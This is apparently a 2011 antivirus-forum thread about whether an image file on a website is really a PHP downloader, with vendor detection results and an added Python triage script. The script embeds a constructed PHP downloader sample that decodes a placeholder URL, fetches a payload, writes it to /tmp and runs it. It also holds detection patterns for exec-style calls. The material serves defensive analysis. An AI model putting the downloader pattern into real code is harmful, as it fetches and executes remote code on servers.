Author Topic: Does site have a PHP downloader?  (Read 2898 times)


polonus
Does site have a PHP downloader?
« on: August 10, 2011, 06:39:49 PM »
See: http://www.virustotal.com/url-scan/report.html?id=d9f0ee71954863bb7354906ebfce4b37-1312985843
and accompanying scan: http://www.virustotal.com/file-scan/report.html?id=ac50e4038d7ef80770860138896415178a156eca38e31d725a598fa8b1f611ce-1312993064
Also consider this: http://anubis.iseclab.org/?action=result&task_id=1fd2bde677aeabbb439a866659e5952b9&format=html
The only flag is from ClamAV:
 WARNING! FILE MAY BE INFECTED!
Clamav
byroe.jpg: PHP.Downloader FOUND
----------- SCAN SUMMARY -----------
Infected files: 1
Time: 0.005 sec (0 m 0 s)
Is this real or a false positive? (See attached gif image.)

Here the site is given as clean: http://www.urlvoid.com/scan/bichoquerido.com
Here also Sucuri:
status:   Verified Clean
web trust:     Not Blacklisted

polonus
« Last Edit: August 11, 2011, 05:05:58 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

polonus
Re: Does site have a PHP downloader?
« Reply #1 on: August 10, 2011, 09:45:12 PM »
My forum friends,

My guess is that this should probably be detected as "PHP:Multicom-B" by avast's Web Shield; it is not, but what happens is that I am stopped from going there by the BitDefender TrafficLight extension in my Google Chrome browser.
Here it was not being detected: http://wepawet.cs.ucsb.edu/view.php?hash=224171abb521a8bad1b8084974fc6c78&t=1313005017&type=js
But it is in this database as an RFI attack site: -http://www.bizimbal.com/odb/details.html?id=976939

polonus
« Last Edit: August 11, 2011, 05:06:23 PM by polonus »
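The two posts above turn on one question: is a file served as byroe.jpg really an image, or a PHP script that a remote-file-inclusion (RFI) victim would include and run? A server that does include($_GET['page']) with allow_url_include on executes whatever PHP the remote "image" contains, regardless of its extension, and a downloader of this kind typically fetches a payload over HTTP, writes it to disk and executes it. The following is an added triage script, not code from the thread, from polonus, or from any of the scanners named here; the sample blobs it checks are constructed stand-ins (a fake downloader, a minimal JPEG header, and a JPEG-plus-PHP polyglot), not the real byroe.jpg, and the URL inside them is a placeholder.

```python
"""Triage a file that claims to be a JPEG but may be a PHP downloader.

Added example for this thread; the samples below are constructed
stand-ins and are NOT the byroe.jpg discussed above.
"""
import base64
import re

JPEG_MAGIC = b"\xff\xd8\xff"  # SOI marker every JPEG starts with

# Constructed downloader body: fetch a payload, write it to disk, run it.
# The URL is a placeholder (example.invalid never resolves).
_URL = b"http://example.invalid/bot.txt"
SAMPLE_DOWNLOADER = (
    b"<?php\n"
    b"$u = base64_decode('" + base64.b64encode(_URL) + b"');\n"
    b"$d = file_get_contents($u);\n"
    b"file_put_contents('/tmp/.x', $d);\n"
    b"system('perl /tmp/.x');\n"
    b"?>\n"
)

# Constructed benign blob: JPEG SOI + APP0/JFIF header, padding, EOI marker.
SAMPLE_IMAGE = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01" + b"\x00" * 64 + b"\xff\xd9"

# Polyglot: a real image prefix with PHP appended. include() runs the PHP
# anyway, so a magic-bytes check alone is not enough to clear a file.
SAMPLE_POLYGLOT = SAMPLE_IMAGE + SAMPLE_DOWNLOADER

# Indicators of the fetch -> write -> execute chain a downloader needs.
FETCH = re.compile(rb"\b(file_get_contents|curl_exec|fopen|fsockopen)\s*\(", re.I)
WRITE = re.compile(rb"\b(file_put_contents|fwrite|fputs)\s*\(", re.I)
EXEC = re.compile(rb"\b(system|exec|shell_exec|passthru|popen|proc_open|eval)\s*\(", re.I)
B64_ARG = re.compile(rb"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]")
URL = re.compile(rb"https?://", re.I)


def decoded_literals(data: bytes) -> bytes:
    """Return every decodable base64_decode('...') argument, joined by newlines.

    Downloaders often hide the payload URL this way, so the URL check below
    runs over the decoded strings as well as the raw bytes.
    """
    out = []
    for m in B64_ARG.finditer(data):
        try:
            out.append(base64.b64decode(m.group(1), validate=True))
        except ValueError:
            pass  # not valid base64, ignore
    return b"\n".join(out)


def triage_image(data: bytes) -> dict:
    """Classify purported image bytes.

    verdict is one of:
      image          - JPEG magic present, no PHP open tag
      php-downloader - PHP that fetches over HTTP and then writes or executes
      php-code       - PHP present but no complete downloader pattern
      unknown        - neither JPEG nor PHP
    """
    has_magic = data.startswith(JPEG_MAGIC)
    has_php = b"<?php" in data or b"<?=" in data
    visible = data + b"\n" + decoded_literals(data)
    fetch = bool(FETCH.search(data))
    write = bool(WRITE.search(data))
    execute = bool(EXEC.search(data))
    url = bool(URL.search(visible))
    if has_php and fetch and url and (write or execute):
        verdict = "php-downloader"
    elif has_php:
        verdict = "php-code"
    elif has_magic:
        verdict = "image"
    else:
        verdict = "unknown"
    return {
        "verdict": verdict,
        "jpeg_magic": has_magic,
        "php": has_php,
        "polyglot": has_magic and has_php,
        "fetch": fetch,
        "write": write,
        "execute": execute,
        "url": url,
    }


if __name__ == "__main__":
    for name, blob in [("downloader", SAMPLE_DOWNLOADER),
                       ("image", SAMPLE_IMAGE),
                       ("polyglot", SAMPLE_POLYGLOT)]:
        print(name, triage_image(blob))
```

The verdict is a heuristic, not a replacement for a scanner: a downloader that builds its function names with str_rot13 or string concatenation, or that stages the URL through a second request, will land in "php-code" rather than "php-downloader". What the script does settle is the question in the first post: a file that starts with a PHP open tag, or carries one after a valid JPEG header, is not an image whatever its extension says, and a flag on it is not a false positive on that ground alone.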

Pondus
Re: Does site have a PHP downloader?
« Reply #2 on: August 11, 2011, 10:41:12 AM »
This is what Avira says:
Quote
The file 'byroe.jpg' has been determined to be 'MALWARE'. Our analysts named the threat PHP/Dldr.Zit.J. The term "PHP/" denotes a PHP script virus. Detection will be added to our virus definition file (VDF) with one of the next updates.


and Sophos:
Quote
The file(s) submitted were malicious in nature and detection will be available on the Sophos Databank shortly.


Norman:
Quote
It's been cleared that the file is malicious and has the behavior of downloading a bot file and executing it.
byroe.jpg : Processed - PHP/Dloader.AE

« Last Edit: August 12, 2011, 08:27:48 AM by Pondus »